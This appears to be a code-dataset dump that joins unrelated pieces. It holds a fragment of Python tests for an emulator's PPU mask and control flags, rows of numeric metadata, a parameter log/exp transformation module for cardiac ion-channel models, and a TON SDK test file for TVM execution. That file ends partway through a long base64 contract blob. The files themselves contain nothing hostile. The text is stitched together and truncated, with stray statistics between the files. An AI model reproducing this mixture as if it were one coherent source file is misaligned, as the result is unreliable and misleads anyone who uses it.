self.ppu.sprite_enable = False
self.assertEquals(0b00000000, self.ppu.mask)
self.assertEquals(False, self.ppu.sprite_enable)
def test_ppu_toogle_background(self):
self.assertEquals(0b00000000, self.ppu.mask)
self.ppu.background_enable = True
self.assertEquals(0b00001000, self.ppu.mask)
self.assertEquals(True, self.ppu.background_enable)
self.ppu.background_enable = False
self.assertEquals(0b00000000, self.ppu.mask)
self.assertEquals(False, self.ppu.background_enable)
def test_ppu_toogle_background2(self):
self.assertEquals(0b00000000, self.ppu.ctrl)
self.assertEquals(0b00000000, self.ppu.mask)
self.ppu.nmi_enable = True
self.ppu.sprite_enable = True
self.assertEquals(0b10000000, self.ppu.ctrl)
self.assertEquals(True, self.ppu.nmi_enable)
self.assertEquals(0b00010000, self.ppu.mask)
self.assertEquals(True, self.ppu.sprite_enable)
| 37.046875
| 60
| 0.694644
| 295
| 2,371
| 5.433898
| 0.115254
| 0.179039
| 0.194635
| 0.224579
| 0.854648
| 0.73612
| 0.726138
| 0.701185
| 0.533999
| 0.444167
| 0
| 0.093617
| 0.207086
| 2,371
| 63
| 61
| 37.634921
| 0.759043
| 0
| 0
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.519231
| 1
| 0.153846
| false
| 0
| 0.038462
| 0
| 0.211538
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
740c0e19256f8cd55d090dbbde99684273871f1e
| 13,544
|
py
|
Python
|
Parameter_inference_real_data/python/transformation.py
|
CardiacModelling/model-reduction-manifold-boundaries
|
88ccb24d0ec9d0742a4a93e820fec7fee1a65b61
|
[
"BSD-3-Clause"
] | null | null | null |
Parameter_inference_real_data/python/transformation.py
|
CardiacModelling/model-reduction-manifold-boundaries
|
88ccb24d0ec9d0742a4a93e820fec7fee1a65b61
|
[
"BSD-3-Clause"
] | null | null | null |
Parameter_inference_real_data/python/transformation.py
|
CardiacModelling/model-reduction-manifold-boundaries
|
88ccb24d0ec9d0742a4a93e820fec7fee1a65b61
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
#
# Parameter transformations
#
from __future__ import division, print_function
import numpy as np
class Transformation(object):
"""
Transforms from model to search space (and back).
"""
def transform(self, parameters, which_model, noise=False):
"""
Transform from model into search space.
"""
if which_model == 'mazhari':
x = np.array([
np.log(parameters[0]),
parameters[1],
np.log(parameters[2]),
parameters[3],
np.log(parameters[4]),
parameters[5],
np.log(parameters[6]),
parameters[7],
np.log(parameters[8]),
parameters[9],
np.log(parameters[10]),
parameters[11],
np.log(parameters[12]),
parameters[13],
np.log(parameters[14]),
np.log(parameters[15]),
# Conductance
parameters[16]
])
elif which_model == 'mazhari-reduced':
x = np.array([
np.log(parameters[0]),
parameters[1],
np.log(parameters[2]),
parameters[3],
np.log(parameters[4]),
np.log(parameters[5]),
parameters[6],
np.log(parameters[7]),
np.log(parameters[8]),
parameters[9],
# Conductance
parameters[10]
])
elif which_model == 'wang':
x = np.array([
np.log(parameters[0]),
parameters[1],
np.log(parameters[2]),
parameters[3],
np.log(parameters[4]),
np.log(parameters[5]),
np.log(parameters[6]),
parameters[7],
np.log(parameters[8]),
parameters[9],
np.log(parameters[10]),
parameters[11],
np.log(parameters[12]),
parameters[13],
# Conductance
parameters[14]
])
elif which_model == 'wang-r1':
x = np.array([
np.log(parameters[0]),
parameters[1],
np.log(parameters[2]),
parameters[3],
np.log(parameters[4]),
np.log(parameters[5]),
np.log(parameters[6]),
parameters[7],
np.log(parameters[8]),
parameters[9],
np.log(parameters[10]),
parameters[11],
np.log(parameters[12]),
# Conductance
parameters[13]
])
elif which_model == 'wang-r2':
x = np.array([
np.log(parameters[0]),
parameters[1],
np.log(parameters[2]),
parameters[3],
np.log(parameters[4]),
np.log(parameters[5]),
np.log(parameters[6]),
parameters[7],
np.log(parameters[8]),
parameters[9],
np.log(parameters[10]),
parameters[11],
# Conductance
parameters[12]
])
elif which_model == 'wang-r3':
x = np.array([
np.log(parameters[0]),
parameters[1],
np.log(parameters[2]),
parameters[3],
np.log(parameters[4]),
np.log(parameters[5]),
np.log(parameters[6]),
parameters[7],
np.log(parameters[8]),
parameters[9],
parameters[10],
# Conductance
parameters[11]
])
elif which_model == 'wang-r4':
x = np.array([
np.log(parameters[0]),
np.log(parameters[1]),
parameters[2],
np.log(parameters[3]),
np.log(parameters[4]),
np.log(parameters[5]),
parameters[6],
np.log(parameters[7]),
parameters[8],
parameters[9],
# Conductance
parameters[10]
])
elif which_model == 'wang-r5':
x = np.array([
np.log(parameters[0]),
parameters[1],
np.log(parameters[2]),
np.log(parameters[3]),
np.log(parameters[4]),
parameters[5],
np.log(parameters[6]),
parameters[7],
parameters[8],
# Conductance
parameters[9]
])
elif which_model == 'wang-r6':
x = np.array([
parameters[0],
np.log(parameters[1]),
np.log(parameters[2]),
np.log(parameters[3]),
parameters[4],
np.log(parameters[5]),
parameters[6],
parameters[7],
# Conductance
parameters[8]
])
elif which_model == 'wang-r7':
x = np.array([
parameters[0],
np.log(parameters[1]),
np.log(parameters[2]),
np.log(parameters[3]),
parameters[4],
np.log(parameters[5]),
parameters[6],
# Conductance
parameters[7]
])
elif which_model == 'wang-r8':
x = np.array([
parameters[0],
np.log(parameters[1]),
np.log(parameters[2]),
np.log(parameters[3]),
parameters[4],
parameters[5],
# Conductance
parameters[6]
])
else:
pass
return x
def detransform(self, transformed_parameters, which_model, noise=False):
"""
Transform back from search space to model space.
"""
if which_model == 'mazhari':
x = np.array([
np.exp(transformed_parameters[0]),
transformed_parameters[1],
np.exp(transformed_parameters[2]),
transformed_parameters[3],
np.exp(transformed_parameters[4]),
transformed_parameters[5],
np.exp(transformed_parameters[6]),
transformed_parameters[7],
np.exp(transformed_parameters[8]),
transformed_parameters[9],
np.exp(transformed_parameters[10]),
transformed_parameters[11],
np.exp(transformed_parameters[12]),
transformed_parameters[13],
np.exp(transformed_parameters[14]),
np.exp(transformed_parameters[15]),
# Conductance
transformed_parameters[16]
])
elif which_model == 'mazhari-reduced':
x = np.array([
np.exp(transformed_parameters[0]),
transformed_parameters[1],
np.exp(transformed_parameters[2]),
transformed_parameters[3],
np.exp(transformed_parameters[4]),
np.exp(transformed_parameters[5]),
transformed_parameters[6],
np.exp(transformed_parameters[7]),
np.exp(transformed_parameters[8]),
transformed_parameters[9],
# Conductance
transformed_parameters[10]
])
elif which_model == 'wang':
x = np.array([
np.exp(transformed_parameters[0]),
transformed_parameters[1],
np.exp(transformed_parameters[2]),
transformed_parameters[3],
np.exp(transformed_parameters[4]),
np.exp(transformed_parameters[5]),
np.exp(transformed_parameters[6]),
transformed_parameters[7],
np.exp(transformed_parameters[8]),
transformed_parameters[9],
np.exp(transformed_parameters[10]),
transformed_parameters[11],
np.exp(transformed_parameters[12]),
transformed_parameters[13],
# Conductance
transformed_parameters[14]
])
elif which_model == 'wang-r1':
x = np.array([
np.exp(transformed_parameters[0]),
transformed_parameters[1],
np.exp(transformed_parameters[2]),
transformed_parameters[3],
np.exp(transformed_parameters[4]),
np.exp(transformed_parameters[5]),
np.exp(transformed_parameters[6]),
transformed_parameters[7],
np.exp(transformed_parameters[8]),
transformed_parameters[9],
np.exp(transformed_parameters[10]),
transformed_parameters[11],
np.exp(transformed_parameters[12]),
# Conductance
transformed_parameters[13]
])
elif which_model == 'wang-r2':
x = np.array([
np.exp(transformed_parameters[0]),
transformed_parameters[1],
np.exp(transformed_parameters[2]),
transformed_parameters[3],
np.exp(transformed_parameters[4]),
np.exp(transformed_parameters[5]),
np.exp(transformed_parameters[6]),
transformed_parameters[7],
np.exp(transformed_parameters[8]),
transformed_parameters[9],
np.exp(transformed_parameters[10]),
transformed_parameters[11],
# Conductance
transformed_parameters[12]
])
elif which_model == 'wang-r3':
x = np.array([
np.exp(transformed_parameters[0]),
transformed_parameters[1],
np.exp(transformed_parameters[2]),
transformed_parameters[3],
np.exp(transformed_parameters[4]),
np.exp(transformed_parameters[5]),
np.exp(transformed_parameters[6]),
transformed_parameters[7],
np.exp(transformed_parameters[8]),
transformed_parameters[9],
transformed_parameters[10],
# Conductance
transformed_parameters[11]
])
elif which_model == 'wang-r4':
x = np.array([
np.exp(transformed_parameters[0]),
np.exp(transformed_parameters[1]),
transformed_parameters[2],
np.exp(transformed_parameters[3]),
np.exp(transformed_parameters[4]),
np.exp(transformed_parameters[5]),
transformed_parameters[6],
np.exp(transformed_parameters[7]),
transformed_parameters[8],
transformed_parameters[9],
# Conductance
transformed_parameters[10]
])
elif which_model == 'wang-r5':
x = np.array([
np.exp(transformed_parameters[0]),
transformed_parameters[1],
np.exp(transformed_parameters[2]),
np.exp(transformed_parameters[3]),
np.exp(transformed_parameters[4]),
transformed_parameters[5],
np.exp(transformed_parameters[6]),
transformed_parameters[7],
transformed_parameters[8],
# Conductance
transformed_parameters[9]
])
elif which_model == 'wang-r6':
x = np.array([
transformed_parameters[0],
np.exp(transformed_parameters[1]),
np.exp(transformed_parameters[2]),
np.exp(transformed_parameters[3]),
transformed_parameters[4],
np.exp(transformed_parameters[5]),
transformed_parameters[6],
transformed_parameters[7],
# Conductance
transformed_parameters[8]
])
elif which_model == 'wang-r7':
x = np.array([
transformed_parameters[0],
np.exp(transformed_parameters[1]),
np.exp(transformed_parameters[2]),
np.exp(transformed_parameters[3]),
transformed_parameters[4],
np.exp(transformed_parameters[5]),
transformed_parameters[6],
# Conductance
transformed_parameters[7]
])
elif which_model == 'wang-r8':
x = np.array([
transformed_parameters[0],
np.exp(transformed_parameters[1]),
np.exp(transformed_parameters[2]),
np.exp(transformed_parameters[3]),
transformed_parameters[4],
transformed_parameters[5],
# Conductance
transformed_parameters[6]
])
else:
pass
return x
| 36.213904
| 76
| 0.464117
| 1,159
| 13,544
| 5.288179
| 0.062985
| 0.438571
| 0.161527
| 0.27998
| 0.885626
| 0.885626
| 0.851036
| 0.848752
| 0.839452
| 0.83162
| 0
| 0.040877
| 0.427422
| 13,544
| 373
| 77
| 36.310992
| 0.749452
| 0.033225
| 0
| 0.906344
| 0
| 0
| 0.01261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006042
| false
| 0.006042
| 0.006042
| 0
| 0.021148
| 0.003021
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
741173391445414f94453d508de8e0ef6dabf6e9
| 57,723
|
py
|
Python
|
tonclient/test/test_tvm.py
|
move-ton/ton-client-py
|
a9393a0e03b5da9bf5369a44c6873a3e720af229
|
[
"Apache-2.0"
] | 28
|
2020-10-29T06:57:32.000Z
|
2022-03-20T12:26:14.000Z
|
tonclient/test/test_tvm.py
|
move-ton/ton-client-py
|
a9393a0e03b5da9bf5369a44c6873a3e720af229
|
[
"Apache-2.0"
] | 1
|
2021-03-30T18:18:17.000Z
|
2021-04-04T15:35:10.000Z
|
tonclient/test/test_tvm.py
|
move-ton/ton-client-py
|
a9393a0e03b5da9bf5369a44c6873a3e720af229
|
[
"Apache-2.0"
] | 8
|
2020-10-28T20:11:52.000Z
|
2022-01-12T12:28:02.000Z
|
import base64
import json
import os
import unittest
from tonclient.errors import TonException
from tonclient.test.helpers import send_grams, SAMPLES_DIR, async_core_client,\
sync_core_client
from tonclient.types import Abi, DeploySet, CallSet, Signer, StateInitSource, \
AccountForExecutor, ParamsOfEncodeMessage, ParamsOfProcessMessage, \
ParamsOfWaitForCollection, ParamsOfParse, ParamsOfRunExecutor, \
ParamsOfRunTvm, ParamsOfEncodeAccount, ParamsOfRunGet, BocCacheType
class TestTonTvmAsyncCore(unittest.TestCase):
def test_execute_message(self):
abi = Abi.from_path(
os.path.join(SAMPLES_DIR, 'Subscription.abi.json'))
with open(os.path.join(SAMPLES_DIR, 'Subscription.tvc'), 'rb') as fp:
tvc = base64.b64encode(fp.read()).decode()
keypair = async_core_client.crypto.generate_random_sign_keys()
wallet_address = '0:2222222222222222222222222222222222222222222222222222222222222222'
# Deploy message
deploy_set = DeploySet(tvc=tvc)
call_set = CallSet(
function_name='constructor', input={'wallet': wallet_address})
signer = Signer.Keys(keys=keypair)
# Get account deploy message
encode_params = ParamsOfEncodeMessage(
abi=abi, signer=signer, deploy_set=deploy_set, call_set=call_set)
deploy_message = async_core_client.abi.encode_message(
params=encode_params)
# Send grams
send_grams(address=deploy_message.address)
# Deploy account
process_params = ParamsOfProcessMessage(
message_encode_params=encode_params, send_events=False)
async_core_client.processing.process_message(params=process_params)
# Get account data
q_params = ParamsOfWaitForCollection(
collection='accounts', result='id boc',
filter={'id': {'eq': deploy_message.address}})
account = async_core_client.net.wait_for_collection(params=q_params)
# Get account balance
parse_params = ParamsOfParse(boc=account.result['boc'])
parsed = async_core_client.boc.parse_account(params=parse_params)
orig_balance = parsed.parsed['balance']
# Run executor (unlimited balance should not affect account balance)
subscribe_params = {
'subscriptionId': '0x1111111111111111111111111111111111111111111111111111111111111111',
'pubkey': '0x2222222222222222222222222222222222222222222222222222222222222222',
'to': '0:3333333333333333333333333333333333333333333333333333333333333333',
'value': '0x123',
'period': '0x456'
}
call_set = CallSet(function_name='subscribe', input=subscribe_params)
encode_params = ParamsOfEncodeMessage(
abi=abi, signer=signer, address=deploy_message.address,
call_set=call_set)
encoded_message = async_core_client.abi.encode_message(
params=encode_params)
account_for_executor = AccountForExecutor.Account(
boc=account.result['boc'], unlimited_balance=True)
run_params = ParamsOfRunExecutor(
message=encoded_message.message, account=account_for_executor,
abi=abi, return_updated_account=True)
result = async_core_client.tvm.run_executor(params=run_params)
# Get account balance again
parse_params.boc = result.account
parsed = async_core_client.boc.parse_account(params=parse_params)
self.assertLess(
int(orig_balance, 16), int(parsed.parsed['balance'], 16))
# Run executor in standard mode (limited balance)
account_for_executor = AccountForExecutor.Account(
boc=account.result['boc'], unlimited_balance=False)
run_params = ParamsOfRunExecutor(
message=encoded_message.message, account=account_for_executor,
abi=abi, return_updated_account=True)
result = async_core_client.tvm.run_executor(params=run_params)
self.assertEqual(
encoded_message.message_id, result.transaction['in_msg'])
self.assertGreater(result.fees.total_account_fees, 0)
# Check subscription
call_set = CallSet(
function_name='getSubscription',
input={'subscriptionId': subscribe_params['subscriptionId']})
encode_params = ParamsOfEncodeMessage(
abi=abi, signer=signer, address=deploy_message.address,
call_set=call_set)
encoded_message = async_core_client.abi.encode_message(
params=encode_params)
run_params = ParamsOfRunTvm(
message=encoded_message.message, account=result.account, abi=abi)
result = async_core_client.tvm.run_tvm(params=run_params)
self.assertEqual(
subscribe_params['pubkey'],
result.decoded.output['value0']['pubkey'])
def test_run_get(self):
elector_address = '-1:3333333333333333333333333333333333333333333333333333333333333333'
elector_code = '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'
elector_data = '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